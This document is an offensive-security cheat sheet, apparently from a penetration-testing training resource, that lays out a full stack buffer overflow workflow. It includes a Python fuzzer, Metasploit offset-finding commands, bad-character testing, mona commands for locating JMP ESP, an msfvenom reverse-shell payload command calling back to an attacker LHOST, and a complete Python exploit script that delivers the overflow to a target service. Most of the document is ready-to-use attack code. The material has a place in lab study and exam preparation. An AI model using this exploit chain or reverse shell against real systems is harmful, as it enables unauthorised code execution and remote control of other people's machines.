💥 Buffer Overflow
Structured methodology for stack-based buffer overflow exploitation.
METHODOLOGY
1. Fuzzing — Find the crash point
Send increasing payloads to identify the approximate crash offset
import socket
buffer = b"A" * 100
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("$IP", 9999))
s.send(buffer + b"\r\n")
s.close()
buffer += b"A" * 100
except:
print(f"Crashed at {len(buffer)} bytes")
break
Example Output
Crashed at 2500 bytes
2. Find exact offset
Use pattern_create to find EIP offset — Tells you exactly where EIP is
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2500
# Send the pattern as payload, note EIP value
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2500 -q <EIP_VALUE>
Example Output
[*] Exact match at offset 2003
EIP is at bytes 2003-2006
3. Confirm EIP control
Overwrite EIP with known value — Verify you control execution flow
offset = 2003
buffer = b"A" * offset + b"B" * 4 + b"C" * (2500 - offset - 4)
# EIP should be 42424242 (BBBB)
4. Find bad characters
Send all bytes 0x00-0xFF — Identify characters that break the shellcode
badchars = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
b"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
# ... continue through 0xff
)
# \x00 is almost always bad - exclude it
# Compare in debugger: any byte that doesn't appear or corrupts following bytes = bad
5. Find JMP ESP
Locate a JMP ESP instruction in a module without ASLR/DEP — This becomes your return address
# In Immunity Debugger with mona:
!mona jmp -r esp -cpb "\x00"
# Or find manually:
!mona modules # Find module with no protections
!mona find -s "\xff\xe4" -m <module.dll>
Example Output
0x625011af : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll]
ASLR: False, Rebase: False, SafeSEH: False
Use this address as your EIP overwrite (little endian)
6. Generate shellcode
msfvenom payload excluding bad chars — Reverse shell or bind shell
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -b "\x00" -f python -v shellcode
7. Final exploit
Combine all components — NOP sled + shellcode
import socket
offset = 2003
jmp_esp = b"\xaf\x11\x50\x62" # 0x625011af in little endian
nop_sled = b"\x90" * 16
shellcode = b"" # paste msfvenom output here
buffer = b"A" * offset + jmp_esp + nop_sled + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("$IP", 9999))
s.send(buffer + b"\r\n")
s.close()
QUICK CHECKLIST
BOF exploit development order
Follow this exact order every time — Don't skip steps
1. Fuzz → find approximate crash length
2. pattern_create → find exact EIP offset
3. Confirm EIP control with "BBBB" (0x42424242)
4. Bad chars → test 0x01-0xFF (0x00 always bad)
5. JMP ESP → find in unprotected module
6. Shellcode → msfvenom with -b for bad chars
7. Exploit → offset + JMP ESP + NOPs + shellcode
COMMON BAD CHARACTERS
Usual suspects
These are frequently bad — Always test all 256 though
\x00 Null byte (almost always bad)
\x0a Line feed (\n)
\x0d Carriage return (\r)
\x25 Percent (%)
\x2b Plus (+)
\x2f Forward slash (/)
\x5c Backslash (\)